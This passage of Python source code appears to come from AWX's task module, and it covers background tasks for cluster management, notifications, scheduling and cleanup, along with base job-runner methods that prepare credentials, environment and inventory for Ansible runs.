logger.debug('Cluster policy no-op finished in {} seconds'.format(time.time() - started_compute))
return
# On a differential basis, apply instances to groups
with transaction.atomic():
for g in actual_groups:
if g.obj.is_container_group:
logger.debug('Skipping containerized group {} for policy calculation'.format(g.obj.name))
continue
instances_to_add = set(g.instances) - set(g.prior_instances)
instances_to_remove = set(g.prior_instances) - set(g.instances)
if instances_to_add:
logger.debug('Adding instances {} to group {}'.format(list(instances_to_add), g.obj.name))
g.obj.instances.add(*instances_to_add)
if instances_to_remove:
logger.debug('Removing instances {} from group {}'.format(list(instances_to_remove), g.obj.name))
g.obj.instances.remove(*instances_to_remove)
logger.debug('Cluster policy computation finished in {} seconds'.format(time.time() - started_compute))
@task(queue='tower_broadcast_all')
def handle_setting_changes(setting_keys):
orig_len = len(setting_keys)
for i in range(orig_len):
for dependent_key in settings_registry.get_dependent_settings(setting_keys[i]):
setting_keys.append(dependent_key)
cache_keys = set(setting_keys)
logger.debug('cache delete_many(%r)', cache_keys)
cache.delete_many(cache_keys)
if any([setting.startswith('LOG_AGGREGATOR') for setting in setting_keys]):
reconfigure_rsyslog()
@task(queue='tower_broadcast_all')
def delete_project_files(project_path):
# TODO: possibly implement some retry logic
lock_file = project_path + '.lock'
if os.path.exists(project_path):
try:
shutil.rmtree(project_path)
logger.debug('Success removing project files {}'.format(project_path))
except Exception:
logger.exception('Could not remove project directory {}'.format(project_path))
if os.path.exists(lock_file):
try:
os.remove(lock_file)
logger.debug('Success removing {}'.format(lock_file))
except Exception:
logger.exception('Could not remove lock file {}'.format(lock_file))
@task(queue='tower_broadcast_all')
def profile_sql(threshold=1, minutes=1):
if threshold <= 0:
cache.delete('awx-profile-sql-threshold')
logger.error('SQL PROFILING DISABLED')
else:
cache.set('awx-profile-sql-threshold', threshold, timeout=minutes * 60)
logger.error('SQL QUERIES >={}s ENABLED FOR {} MINUTE(S)'.format(threshold, minutes))
@task(queue=get_local_queuename)
def send_notifications(notification_list, job_id=None):
if not isinstance(notification_list, list):
raise TypeError("notification_list should be of type list")
if job_id is not None:
job_actual = UnifiedJob.objects.get(id=job_id)
notifications = Notification.objects.filter(id__in=notification_list)
if job_id is not None:
job_actual.notifications.add(*notifications)
for notification in notifications:
update_fields = ['status', 'notifications_sent']
try:
sent = notification.notification_template.send(notification.subject, notification.body)
notification.status = "successful"
notification.notifications_sent = sent
if job_id is not None:
job_actual.log_lifecycle("notifications_sent")
except Exception as e:
logger.exception("Send Notification Failed {}".format(e))
notification.status = "failed"
notification.error = smart_str(e)
update_fields.append('error')
finally:
try:
notification.save(update_fields=update_fields)
except Exception:
logger.exception('Error saving notification {} result.'.format(notification.id))
@task(queue=get_local_queuename)
def gather_analytics():
from awx.conf.models import Setting
from rest_framework.fields import DateTimeField
last_gather = Setting.objects.filter(key='AUTOMATION_ANALYTICS_LAST_GATHER').first()
last_time = DateTimeField().to_internal_value(last_gather.value) if last_gather and last_gather.value else None
gather_time = now()
if not last_time or ((gather_time - last_time).total_seconds() > settings.AUTOMATION_ANALYTICS_GATHER_INTERVAL):
analytics.gather()
@task(queue=get_local_queuename)
def purge_old_stdout_files():
nowtime = time.time()
for f in os.listdir(settings.JOBOUTPUT_ROOT):
if os.path.getctime(os.path.join(settings.JOBOUTPUT_ROOT, f)) < nowtime - settings.LOCAL_STDOUT_EXPIRE_TIME:
os.unlink(os.path.join(settings.JOBOUTPUT_ROOT, f))
logger.debug("Removing {}".format(os.path.join(settings.JOBOUTPUT_ROOT, f)))
@task(queue=get_local_queuename)
def cleanup_execution_environment_images():
if settings.IS_K8S:
return
process = subprocess.run('podman images --filter="dangling=true" --format json'.split(" "), capture_output=True)
if process.returncode != 0:
logger.debug("Cleanup execution environment images: could not get list of images")
return
if len(process.stdout) > 0:
images_system = json.loads(process.stdout)
for e in images_system:
image_name = e["Id"]
logger.debug(f"Cleanup execution environment images: deleting {image_name}")
process = subprocess.run(['podman', 'rmi', image_name, '-f'], stdout=subprocess.DEVNULL)
if process.returncode != 0:
logger.debug(f"Failed to delete image {image_name}")
@task(queue=get_local_queuename)
def cluster_node_heartbeat():
logger.debug("Cluster node heartbeat task.")
nowtime = now()
instance_list = list(Instance.objects.all())
this_inst = None
lost_instances = []
(changed, instance) = Instance.objects.get_or_register()
if changed:
logger.info("Registered tower node '{}'".format(instance.hostname))
for inst in list(instance_list):
if inst.hostname == settings.CLUSTER_HOST_ID:
this_inst = inst
instance_list.remove(inst)
elif inst.is_lost(ref_time=nowtime):
lost_instances.append(inst)
instance_list.remove(inst)
if this_inst:
startup_event = this_inst.is_lost(ref_time=nowtime)
this_inst.refresh_capacity()
if startup_event:
logger.warning('Rejoining the cluster as instance {}.'.format(this_inst.hostname))
return
else:
raise RuntimeError("Cluster Host Not Found: {}".format(settings.CLUSTER_HOST_ID))
# IFF any node has a greater version than we do, then we'll shutdown services
for other_inst in instance_list:
if other_inst.version == "":
continue
if Version(other_inst.version.split('-', 1)[0]) > Version(awx_application_version.split('-', 1)[0]) and not settings.DEBUG:
logger.error(
"Host {} reports version {}, but this node {} is at {}, shutting down".format(
other_inst.hostname, other_inst.version, this_inst.hostname, this_inst.version
)
)
# Shutdown signal will set the capacity to zero to ensure no Jobs get added to this instance.
# The heartbeat task will reset the capacity to the system capacity after upgrade.
stop_local_services(communicate=False)
raise RuntimeError("Shutting down.")
for other_inst in lost_instances:
try:
reaper.reap(other_inst)
except Exception:
logger.exception('failed to reap jobs for {}'.format(other_inst.hostname))
try:
# Capacity could already be 0 because:
# * It's a new node and it never had a heartbeat
# * It was set to 0 by another tower node running this method
# * It was set to 0 by this node, but auto deprovisioning is off
#
# If auto deprovisining is on, don't bother setting the capacity to 0
# since we will delete the node anyway.
if other_inst.capacity != 0 and not settings.AWX_AUTO_DEPROVISION_INSTANCES:
other_inst.capacity = 0
other_inst.save(update_fields=['capacity'])
logger.error("Host {} last checked in at {}, marked as lost.".format(other_inst.hostname, other_inst.modified))
elif settings.AWX_AUTO_DEPROVISION_INSTANCES:
deprovision_hostname = other_inst.hostname
other_inst.delete()
logger.info("Host {} Automatically Deprovisioned.".format(deprovision_hostname))
except DatabaseError as e:
if 'did not affect any rows' in str(e):
logger.debug('Another instance has marked {} as lost'.format(other_inst.hostname))
else:
logger.exception('Error marking {} as lost'.format(other_inst.hostname))
@task(queue=get_local_queuename)
def awx_k8s_reaper():
if not settings.RECEPTOR_RELEASE_WORK:
return
from awx.main.scheduler.kubernetes import PodManager # prevent circular import
for group in InstanceGroup.objects.filter(is_container_group=True).iterator():
logger.debug("Checking for orphaned k8s pods for {}.".format(group))
pods = PodManager.list_active_jobs(group)
for job in UnifiedJob.objects.filter(pk__in=pods.keys()).exclude(status__in=ACTIVE_STATES):
logger.debug('{} is no longer active, reaping orphaned k8s pod'.format(job.log_format))
try:
pm = PodManager(job)
pm.kube_api.delete_namespaced_pod(name=pods[job.id], namespace=pm.namespace, _request_timeout=settings.AWX_CONTAINER_GROUP_K8S_API_TIMEOUT)
except Exception:
logger.exception("Failed to delete orphaned pod {} from {}".format(job.log_format, group))
@task(queue=get_local_queuename)
def awx_periodic_scheduler():
with advisory_lock('awx_periodic_scheduler_lock', wait=False) as acquired:
if acquired is False:
logger.debug("Not running periodic scheduler, another task holds lock")
return
logger.debug("Starting periodic scheduler")
run_now = now()
state = TowerScheduleState.get_solo()
last_run = state.schedule_last_run
logger.debug("Last scheduler run was: %s", last_run)
state.schedule_last_run = run_now
state.save()
old_schedules = Schedule.objects.enabled().before(last_run)
for schedule in old_schedules:
schedule.update_computed_fields()
schedules = Schedule.objects.enabled().between(last_run, run_now)
invalid_license = False
try:
access_registry[Job](None).check_license(quiet=True)
except PermissionDenied as e:
invalid_license = e
for schedule in schedules:
template = schedule.unified_job_template
schedule.update_computed_fields() # To update next_run timestamp.
if template.cache_timeout_blocked:
logger.warn("Cache timeout is in the future, bypassing schedule for template %s" % str(template.id))
continue
try:
job_kwargs = schedule.get_job_kwargs()
new_unified_job = schedule.unified_job_template.create_unified_job(**job_kwargs)
logger.debug('Spawned {} from schedule {}-{}.'.format(new_unified_job.log_format, schedule.name, schedule.pk))
if invalid_license:
new_unified_job.status = 'failed'
new_unified_job.job_explanation = str(invalid_license)
new_unified_job.save(update_fields=['status', 'job_explanation'])
new_unified_job.websocket_emit_status("failed")
raise invalid_license
can_start = new_unified_job.signal_start()
except Exception:
logger.exception('Error spawning scheduled job.')
continue
if not can_start:
new_unified_job.status = 'failed'
new_unified_job.job_explanation = gettext_noop(
"Scheduled job could not start because it \
was not in the right state or required manual credentials"
)
new_unified_job.save(update_fields=['status', 'job_explanation'])
new_unified_job.websocket_emit_status("failed")
emit_channel_notification('schedules-changed', dict(id=schedule.id, group_name="schedules"))
state.save()
@task(queue=get_local_queuename)
def handle_work_success(task_actual):
try:
instance = UnifiedJob.get_instance_by_type(task_actual['type'], task_actual['id'])
except ObjectDoesNotExist:
logger.warning('Missing {} `{}` in success callback.'.format(task_actual['type'], task_actual['id']))
return
if not instance:
return
schedule_task_manager()
@task(queue=get_local_queuename)
def handle_work_error(task_id, *args, **kwargs):
subtasks = kwargs.get('subtasks', None)
logger.debug('Executing error task id %s, subtasks: %s' % (task_id, str(subtasks)))
first_instance = None
first_instance_type = ''
if subtasks is not None:
for each_task in subtasks:
try:
instance = UnifiedJob.get_instance_by_type(each_task['type'], each_task['id'])
if not instance:
# Unknown task type
logger.warn("Unknown task type: {}".format(each_task['type']))
continue
except ObjectDoesNotExist:
logger.warning('Missing {} `{}` in error callback.'.format(each_task['type'], each_task['id']))
continue
if first_instance is None:
first_instance = instance
first_instance_type = each_task['type']
if instance.celery_task_id != task_id and not instance.cancel_flag and not instance.status == 'successful':
instance.status = 'failed'
instance.failed = True
if not instance.job_explanation:
instance.job_explanation = 'Previous Task Failed: {"job_type": "%s", "job_name": "%s", "job_id": "%s"}' % (
first_instance_type,
first_instance.name,
first_instance.id,
)
instance.save()
instance.websocket_emit_status("failed")
# We only send 1 job complete message since all the job completion message
# handling does is trigger the scheduler. If we extend the functionality of
# what the job complete message handler does then we may want to send a
# completion event for each job here.
if first_instance:
schedule_task_manager()
pass
@task(queue=get_local_queuename)
def handle_success_and_failure_notifications(job_id):
uj = UnifiedJob.objects.get(pk=job_id)
retries = 0
while retries < 5:
if uj.finished:
uj.send_notification_templates('succeeded' if uj.status == 'successful' else 'failed')
return
else:
# wait a few seconds to avoid a race where the
# events are persisted _before_ the UJ.status
# changes from running -> successful
retries += 1
time.sleep(1)
uj = UnifiedJob.objects.get(pk=job_id)
logger.warn(f"Failed to even try to send notifications for job '{uj}' due to job not being in finished state.")
@task(queue=get_local_queuename)
def update_inventory_computed_fields(inventory_id):
"""
Signal handler and wrapper around inventory.update_computed_fields to
prevent unnecessary recursive calls.
"""
i = Inventory.objects.filter(id=inventory_id)
if not i.exists():
logger.error("Update Inventory Computed Fields failed due to missing inventory: " + str(inventory_id))
return
i = i[0]
try:
i.update_computed_fields()
except DatabaseError as e:
if 'did not affect any rows' in str(e):
logger.debug('Exiting duplicate update_inventory_computed_fields task.')
return
raise
def update_smart_memberships_for_inventory(smart_inventory):
current = set(SmartInventoryMembership.objects.filter(inventory=smart_inventory).values_list('host_id', flat=True))
new = set(smart_inventory.hosts.values_list('id', flat=True))
additions = new - current
removals = current - new
if additions or removals:
with transaction.atomic():
if removals:
SmartInventoryMembership.objects.filter(inventory=smart_inventory, host_id__in=removals).delete()
if additions:
add_for_inventory = [SmartInventoryMembership(inventory_id=smart_inventory.id, host_id=host_id) for host_id in additions]
SmartInventoryMembership.objects.bulk_create(add_for_inventory, ignore_conflicts=True)
logger.debug(
'Smart host membership cached for {}, {} additions, {} removals, {} total count.'.format(
smart_inventory.pk, len(additions), len(removals), len(new)
)
)
return True # changed
return False
@task(queue=get_local_queuename)
def update_host_smart_inventory_memberships():
smart_inventories = Inventory.objects.filter(kind='smart', host_filter__isnull=False, pending_deletion=False)
changed_inventories = set([])
for smart_inventory in smart_inventories:
try:
changed = update_smart_memberships_for_inventory(smart_inventory)
if changed:
changed_inventories.add(smart_inventory)
except IntegrityError:
logger.exception('Failed to update smart inventory memberships for {}'.format(smart_inventory.pk))
# Update computed fields for changed inventories outside atomic action
for smart_inventory in changed_inventories:
smart_inventory.update_computed_fields()
@task(queue=get_local_queuename)
def migrate_legacy_event_data(tblname):
#
# NOTE: this function is not actually in use anymore,
# but has been intentionally kept for historical purposes,
# and to serve as an illustration if we ever need to perform
# bulk modification/migration of event data in the future.
#
if 'event' not in tblname:
return
with advisory_lock(f'bigint_migration_{tblname}', wait=False) as acquired:
if acquired is False:
return
chunk = settings.JOB_EVENT_MIGRATION_CHUNK_SIZE
def _remaining():
try:
cursor.execute(f'SELECT MAX(id) FROM _old_{tblname};')
return cursor.fetchone()[0]
except ProgrammingError:
# the table is gone (migration is unnecessary)
return None
with connection.cursor() as cursor:
total_rows = _remaining()
while total_rows:
with transaction.atomic():
cursor.execute(f'INSERT INTO {tblname} SELECT * FROM _old_{tblname} ORDER BY id DESC LIMIT {chunk} RETURNING id;')
last_insert_pk = cursor.fetchone()
if last_insert_pk is None:
# this means that the SELECT from the old table was
# empty, and there was nothing to insert (so we're done)
break
last_insert_pk = last_insert_pk[0]
cursor.execute(f'DELETE FROM _old_{tblname} WHERE id IN (SELECT id FROM _old_{tblname} ORDER BY id DESC LIMIT {chunk});')
logger.warn(f'migrated int -> bigint rows to {tblname} from _old_{tblname}; # ({last_insert_pk} rows remaining)')
if _remaining() is None:
cursor.execute(f'DROP TABLE IF EXISTS _old_{tblname}')
logger.warn(f'{tblname} primary key migration to bigint has finished')
@task(queue=get_local_queuename)
def delete_inventory(inventory_id, user_id, retries=5):
# Delete inventory as user
if user_id is None:
user = None
else:
try:
user = User.objects.get(id=user_id)
except Exception:
user = None
with ignore_inventory_computed_fields(), ignore_inventory_group_removal(), impersonate(user):
try:
i = Inventory.objects.get(id=inventory_id)
for host in i.hosts.iterator():
host.job_events_as_primary_host.update(host=None)
i.delete()
emit_channel_notification('inventories-status_changed', {'group_name': 'inventories', 'inventory_id': inventory_id, 'status': 'deleted'})
logger.debug('Deleted inventory {} as user {}.'.format(inventory_id, user_id))
except Inventory.DoesNotExist:
logger.exception("Delete Inventory failed due to missing inventory: " + str(inventory_id))
return
except DatabaseError:
logger.exception('Database error deleting inventory {}, but will retry.'.format(inventory_id))
if retries > 0:
time.sleep(10)
delete_inventory(inventory_id, user_id, retries=retries - 1)
def with_path_cleanup(f):
@functools.wraps(f)
def _wrapped(self, *args, **kwargs):
try:
return f(self, *args, **kwargs)
finally:
for p in self.cleanup_paths:
try:
if os.path.isdir(p):
shutil.rmtree(p, ignore_errors=True)
elif os.path.exists(p):
os.remove(p)
except OSError:
logger.exception("Failed to remove tmp file: {}".format(p))
self.cleanup_paths = []
return _wrapped
class BaseTask(object):
model = None
event_model = None
abstract = True
def __init__(self):
self.cleanup_paths = []
self.parent_workflow_job_id = None
self.host_map = {}
self.guid = GuidMiddleware.get_guid()
def update_model(self, pk, _attempt=0, **updates):
"""Reload the model instance from the database and update the
given fields.
"""
try:
with transaction.atomic():
# Retrieve the model instance.
instance = self.model.objects.get(pk=pk)
# Update the appropriate fields and save the model
# instance, then return the new instance.
if updates:
update_fields = ['modified']
for field, value in updates.items():
setattr(instance, field, value)
update_fields.append(field)
if field == 'status':
update_fields.append('failed')
instance.save(update_fields=update_fields)
return instance
except DatabaseError as e:
# Log out the error to the debug logger.
logger.debug('Database error updating %s, retrying in 5 ' 'seconds (retry #%d): %s', self.model._meta.object_name, _attempt + 1, e)
# Attempt to retry the update, assuming we haven't already
# tried too many times.
if _attempt < 5:
time.sleep(5)
return self.update_model(pk, _attempt=_attempt + 1, **updates)
else:
logger.error('Failed to update %s after %d retries.', self.model._meta.object_name, _attempt)
def get_path_to(self, *args):
"""
Return absolute path relative to this file.
"""
return os.path.abspath(os.path.join(os.path.dirname(__file__), *args))
def build_execution_environment_params(self, instance, private_data_dir):
if settings.IS_K8S:
return {}
image = instance.execution_environment.image
params = {
"container_image": image,
"process_isolation": True,
"container_options": ['--user=root'],
}
if instance.execution_environment.credential:
cred = instance.execution_environment.credential
if cred.has_inputs(field_names=('host', 'username', 'password')):
path = os.path.split(private_data_dir)[0]
with open(path + '/auth.json', 'w') as authfile:
os.chmod(authfile.name, stat.S_IRUSR | stat.S_IWUSR)
host = cred.get_input('host')
username = cred.get_input('username')
password = cred.get_input('password')
token = "{}:{}".format(username, password)
auth_data = {'auths': {host: {'auth': b64encode(token.encode('UTF-8')).decode('UTF-8')}}}
authfile.write(json.dumps(auth_data, indent=4))
params["container_options"].append(f'--authfile={authfile.name}')
else:
raise RuntimeError('Please recheck that your host, username, and password fields are all filled.')
pull = instance.execution_environment.pull
if pull:
params['container_options'].append(f'--pull={pull}')
if settings.AWX_ISOLATION_SHOW_PATHS:
params['container_volume_mounts'] = []
for this_path in settings.AWX_ISOLATION_SHOW_PATHS:
# Using z allows the dir to mounted by multiple containers
# Uppercase Z restricts access (in weird ways) to 1 container at a time
params['container_volume_mounts'].append(f'{this_path}:{this_path}:z')
return params
def build_private_data(self, instance, private_data_dir):
"""
Return SSH private key data (only if stored in DB as ssh_key_data).
Return structure is a dict of the form:
"""
def build_private_data_dir(self, instance):
"""
Create a temporary directory for job-related files.
"""
pdd_wrapper_path = tempfile.mkdtemp(prefix=f'pdd_wrapper_{instance.pk}_', dir=settings.AWX_ISOLATION_BASE_PATH)
os.chmod(pdd_wrapper_path, stat.S_IRUSR | stat.S_IWUSR | stat.S_IXUSR)
if settings.AWX_CLEANUP_PATHS:
self.cleanup_paths.append(pdd_wrapper_path)
path = tempfile.mkdtemp(prefix='awx_%s_' % instance.pk, dir=pdd_wrapper_path)
os.chmod(path, stat.S_IRUSR | stat.S_IWUSR | stat.S_IXUSR)
# Ansible runner requires that project exists,
# and we will write files in the other folders without pre-creating the folder
for subfolder in ('project', 'inventory', 'env'):
runner_subfolder = os.path.join(path, subfolder)
if not os.path.exists(runner_subfolder):
os.mkdir(runner_subfolder)
return path
def build_private_data_files(self, instance, private_data_dir):
"""
Creates temporary files containing the private data.
Returns a dictionary i.e.,
{
'credentials': {
<awx.main.models.Credential>: '/path/to/decrypted/data',
<awx.main.models.Credential>: '/path/to/decrypted/data',
...
},
'certificates': {
<awx.main.models.Credential>: /path/to/signed/ssh/certificate,
<awx.main.models.Credential>: /path/to/signed/ssh/certificate,
...
}
}
"""
private_data = self.build_private_data(instance, private_data_dir)
private_data_files = {'credentials': {}}
if private_data is not None:
for credential, data in private_data.get('credentials', {}).items():
# OpenSSH formatted keys must have a trailing newline to be
# accepted by ssh-add.
if 'OPENSSH PRIVATE KEY' in data and not data.endswith('\n'):
data += '\n'
# For credentials used with ssh-add, write to a named pipe which
# will be read then closed, instead of leaving the SSH key on disk.
if credential and credential.credential_type.namespace in ('ssh', 'scm'):
try:
os.mkdir(os.path.join(private_data_dir, 'env'))
except OSError as e:
if e.errno != errno.EEXIST:
raise
path = os.path.join(private_data_dir, 'env', 'ssh_key')
ansible_runner.utils.open_fifo_write(path, data.encode())
private_data_files['credentials']['ssh'] = path
# Ansible network modules do not yet support ssh-agent.
# Instead, ssh private key file is explicitly passed via an
# env variable.
else:
handle, path = tempfile.mkstemp(dir=os.path.join(private_data_dir, 'env'))
f = os.fdopen(handle, 'w')
f.write(data)
f.close()
os.chmod(path, stat.S_IRUSR | stat.S_IWUSR)
private_data_files['credentials'][credential] = path
for credential, data in private_data.get('certificates', {}).items():
artifact_dir = os.path.join(private_data_dir, 'artifacts', str(self.instance.id))
if not os.path.exists(artifact_dir):
os.makedirs(artifact_dir, mode=0o700)
path = os.path.join(artifact_dir, 'ssh_key_data-cert.pub')
with open(path, 'w') as f:
f.write(data)
f.close()
os.chmod(path, stat.S_IRUSR | stat.S_IWUSR)
return private_data_files
def build_passwords(self, instance, runtime_passwords):
"""
Build a dictionary of passwords for responding to prompts.
"""
return {
'yes': 'yes',
'no': 'no',
'': '',
}
def build_extra_vars_file(self, instance, private_data_dir):
"""
Build ansible yaml file filled with extra vars to be passed via -e@file.yml
"""
def _write_extra_vars_file(self, private_data_dir, vars, safe_dict={}):
env_path = os.path.join(private_data_dir, 'env')
try:
os.mkdir(env_path, stat.S_IREAD | stat.S_IWRITE | stat.S_IEXEC)
except OSError as e:
if e.errno != errno.EEXIST:
raise
path = os.path.join(env_path, 'extravars')
handle = os.open(path, os.O_RDWR | os.O_CREAT, stat.S_IREAD | stat.S_IWRITE)
f = os.fdopen(handle, 'w')
if settings.ALLOW_JINJA_IN_EXTRA_VARS == 'always':
f.write(yaml.safe_dump(vars))
else:
f.write(safe_dump(vars, safe_dict))
f.close()
os.chmod(path, stat.S_IRUSR)
return path
def add_awx_venv(self, env):
env['VIRTUAL_ENV'] = settings.AWX_VENV_PATH
if 'PATH' in env:
env['PATH'] = os.path.join(settings.AWX_VENV_PATH, "bin") + ":" + env['PATH']
else:
env['PATH'] = os.path.join(settings.AWX_VENV_PATH, "bin")
def build_env(self, instance, private_data_dir, private_data_files=None):
"""
Build environment dictionary for ansible-playbook.
"""
env = {}
# Add ANSIBLE_* settings to the subprocess environment.
for attr in dir(settings):
if attr == attr.upper() and attr.startswith('ANSIBLE_'):
env[attr] = str(getattr(settings, attr))
# Also set environment variables configured in AWX_TASK_ENV setting.
for key, value in settings.AWX_TASK_ENV.items():
env[key] = str(value)
env['AWX_PRIVATE_DATA_DIR'] = private_data_dir
if self.instance.execution_environment is None:
raise RuntimeError('The project could not sync because there is no Execution Environment.')
ee_cred = self.instance.execution_environment.credential
if ee_cred:
verify_ssl = ee_cred.get_input('verify_ssl')
if not verify_ssl:
pdd_wrapper_path = os.path.split(private_data_dir)[0]
registries_conf_path = os.path.join(pdd_wrapper_path, 'registries.conf')
host = ee_cred.get_input('host')
with open(registries_conf_path, 'w') as registries_conf:
os.chmod(registries_conf.name, stat.S_IRUSR | stat.S_IWUSR)
lines = [
'[[registry]]',
'location = "{}"'.format(host),
'insecure = true',
]
registries_conf.write('\n'.join(lines))
# Podman >= 3.1.0
env['CONTAINERS_REGISTRIES_CONF'] = registries_conf_path
# Podman < 3.1.0
env['REGISTRIES_CONFIG_PATH'] = registries_conf_path
return env
def build_inventory(self, instance, private_data_dir):
script_params = dict(hostvars=True, towervars=True)
if hasattr(instance, 'job_slice_number'):
script_params['slice_number'] = instance.job_slice_number
script_params['slice_count'] = instance.job_slice_count
script_data = instance.inventory.get_script_data(**script_params)
# maintain a list of host_name --> host_id
# so we can associate emitted events to Host objects
self.host_map = {hostname: hv.pop('remote_tower_id', '') for hostname, hv in script_data.get('_meta', {}).get('hostvars', {}).items()}
json_data = json.dumps(script_data)
path = os.path.join(private_data_dir, 'inventory')
fn = os.path.join(path, 'hosts')
with open(fn, 'w') as f:
os.chmod(fn, stat.S_IRUSR | stat.S_IXUSR | stat.S_IWUSR)
f.write('#! /usr/bin/env python3\n# -*- coding: utf-8 -*-\nprint(%r)\n' % json_data)
return fn
def build_args(self, instance, private_data_dir, passwords):
raise NotImplementedError
def write_args_file(self, private_data_dir, args):
env_path = os.path.join(private_data_dir, 'env')
try:
os.mkdir(env_path, stat.S_IREAD | stat.S_IWRITE | stat.S_IEXEC)
except OSError as e:
if e.errno != errno.EEXIST:
raise
path = os.path.join(env_path, 'cmdline')
handle = os.open(path, os.O_RDWR | os.O_CREAT, stat.S_IREAD | stat.S_IWRITE)
f = os.fdopen(handle, 'w')
f.write(ansible_runner.utils.args2cmdline(*args))
f.close()
os.chmod(path, stat.S_IRUSR)
return path
def build_credentials_list(self, instance):
return []
def get_instance_timeout(self, instance):
global_timeout_setting_name = instance._global_timeout_setting()
if global_timeout_setting_name:
global_timeout = getattr(settings, global_timeout_setting_name, 0)
local_timeout = getattr(instance, 'timeout', 0)
job_timeout = global_timeout if local_timeout == 0 else local_timeout
job_timeout = 0 if local_timeout < 0 else job_timeout
else:
job_timeout = 0
return job_timeout
def get_password_prompts(self, passwords={}):
"""
Return a dictionary where keys are strings or regular expressions for
prompts, and values are password lookup keys (keys that are returned
from build_passwords).
"""
return OrderedDict()
def create_expect_passwords_data_struct(self, password_prompts, passwords):
expect_passwords = {}
for k, v in password_prompts.items():
expect_passwords[k] = passwords.get(v, '') or ''
return expect_passwords
def pre_run_hook(self, instance, private_data_dir):
"""
Hook for any steps to run before the job/task starts
"""
instance.log_lifecycle("pre_run")
def post_run_hook(self, instance, status):
"""
Hook for any steps to run before job/task is marked as complete.
"""
instance.log_lifecycle("post_run")
def final_run_hook(self, instance, status, private_data_dir, fact_modification_times):
"""
Hook for any steps to run after job/task is marked as complete.
"""
instance.log_lifecycle("finalize_run")
job_profiling_dir = os.path.join(private_data_dir, 'artifacts/playbook_profiling')
awx_profiling_dir = '/var/log/tower/playbook_profiling/'
collections_info = os.path.join(private_data_dir, 'artifacts/', 'collections.json')
ansible_version_file = os.path.join(private_data_dir, 'artifacts/', 'ansible_version.txt')
if not os.path.exists(awx_profiling_dir):
os.mkdir(awx_profiling_dir)
if os.path.isdir(job_profiling_dir):
shutil.copytree(job_profiling_dir, os.path.join(awx_profiling_dir, str(instance.pk)))
if os.path.exists(collections_info):
with open(collections_info) as ee_json_info:
ee_collections_info = json.loads(ee_json_info.read())
instance.installed_collections = ee_collections_info
instance.save(update_fields=['installed_collections'])
if os.path.exists(ansible_version_file):
with open(ansible_version_file) as ee_ansible_info:
ansible_version_info = ee_ansible_info.readline()
instance.ansible_version = ansible_version_info
instance.save(update_fields=['ansible_version'])
def event_handler(self, event_data):
#
# ⚠️ D-D-D-DANGER ZONE ⚠️
# This method is called once for *every event* emitted by Ansible
# Runner as a playbook runs. That means that changes to the code in
# this method are _very_ likely to introduce performance regressions.
#
# Even if this function is made on average .05s slower, it can have
# devastating performance implications for playbooks that emit
# tens or hundreds of thousands of events.
#
# Proceed with caution!
#
"""
Ansible runner puts a parent_uuid on each event, no matter what the type.
AWX only saves the parent_uuid if the event is for a Job.
"""
# cache end_line locally for RunInventoryUpdate tasks
# which generate job events from two 'streams':
# ansible-inventory and the awx.main.commands.inventory_import
# logger
if isinstance(self, RunInventoryUpdate):
self.end_line = event_data['end_line']
if event_data.get(self.event_data_key, None):
if self.event_data_key != 'job_id':
event_data.pop('parent_uuid', None)
if self.parent_workflow_job_id:
event_data['workflow_job_id'] = self.parent_workflow_job_id
if self.host_map:
host = event_data.get('event_data', {}).get('host', '').strip()
if host:
event_data['host_name'] = host
if host in self.host_map:
event_data['host_id'] = self.host_map[host]
else:
event_data['host_name'] = ''
event_data['host_id'] = ''
if event_data.get('event') == 'playbook_on_stats':
event_data['host_map'] = self.host_map
if isinstance(self, RunProjectUpdate):
# it's common for Ansible's SCM modules to print
# error messages on failure that contain the plaintext
# basic auth credentials (username + password)
# it's also common for the nested event data itself (['res']['...'])
# to contain unredacted text on failure
# this is a _little_ expensive to filter
# with regex, but project updates don't have many events,
# so it *should* have a negligible performance impact
task = event_data.get('event_data', {}).get('task_action')
try:
if task in ('git', 'svn'):
event_data_json = json.dumps(event_data)
event_data_json = UriCleaner.remove_sensitive(event_data_json)
event_data = json.loads(event_data_json)
except json.JSONDecodeError:
pass
if 'event_data' in event_data:
event_data['event_data']['guid'] = self.guid
event_data.setdefault(self.event_data_key, self.instance.id)
self.dispatcher.dispatch(event_data)
self.event_ct += 1
'''
Handle artifacts
'''
if event_data.get('event_data', {}).get('artifact_data', {}):
self.instance.artifacts = event_data['event_data']['artifact_data']
self.instance.save(update_fields=['artifacts'])
return False
def cancel_callback(self):
"""
Ansible runner callback to tell the job when/if it is canceled
"""
unified_job_id = self.instance.pk
self.instance = self.update_model(unified_job_id)
if not self.instance:
logger.error('unified job {} was deleted while running, canceling'.format(unified_job_id))
return True
if self.instance.cancel_flag or self.instance.status == 'canceled':
cancel_wait = (now() - self.instance.modified).seconds if self.instance.modified else 0
if cancel_wait > 5:
logger.warn('Request to cancel {} took {} seconds to complete.'.format(self.instance.log_format, cancel_wait))
return True
return False
def finished_callback(self, runner_obj):
"""
Ansible runner callback triggered on finished run
"""
event_data = {
'event': 'EOF',
'final_counter': self.event_ct,
'guid': self.guid,
}
event_data.setdefault(self.event_data_key, self.instance.id)
self.dispatcher.dispatch(event_data)
def status_handler(self, status_data, runner_config):
"""
Ansible runner callback triggered on status transition
"""
if status_data['status'] == 'starting':
job_env = dict(runner_config.env)
'''
Take the safe environment variables and overwrite
'''
for k, v in self.safe_env.items():
if k in job_env:
job_env[k] = v
self.instance = self.update_model(self.instance.pk, job_args=json.dumps(runner_config.command), job_cwd=runner_config.cwd, job_env=job_env)
elif status_data['status'] == 'error':
result_traceback = status_data.get('result_traceback', None)
if result_traceback:
self.instance = self.update_model(self.instance.pk, result_traceback=result_traceback)
@with_path_cleanup
def run(self, pk, **kwargs):
"""
Run the job/task and capture its output.
"""
self.instance = self.model.objects.get(pk=pk)
if self.instance.execution_environment_id is None:
from awx.main.signals import disable_activity_stream
with disable_activity_stream():
self.instance = self.update_model(self.instance.pk, execution_environment=self.instance.resolve_execution_environment())
# self.instance because of the update_model pattern and when it's used in callback handlers
self.instance = self.update_model(pk, status='running', start_args='') # blank field to remove encrypted passwords
self.instance.websocket_emit_status("running")
status, rc = 'error', None
extra_update_fields = {}
fact_modification_times = {}
self.event_ct = 0
'''
Needs to be an object property because status_handler uses it in a callback context
'''
self.safe_env = {}
self.safe_cred_env = {}
private_data_dir = None
# store a reference to the parent workflow job (if any) so we can include
# it in event data JSON
if self.instance.spawned_by_workflow:
self.parent_workflow_job_id = self.instance.get_workflow_job().id
try:
self.instance.send_notification_templates("running")
private_data_dir = self.build_private_data_dir(self.instance)
self.pre_run_hook(self.instance, private_data_dir)
self.instance.log_lifecycle("preparing_playbook")
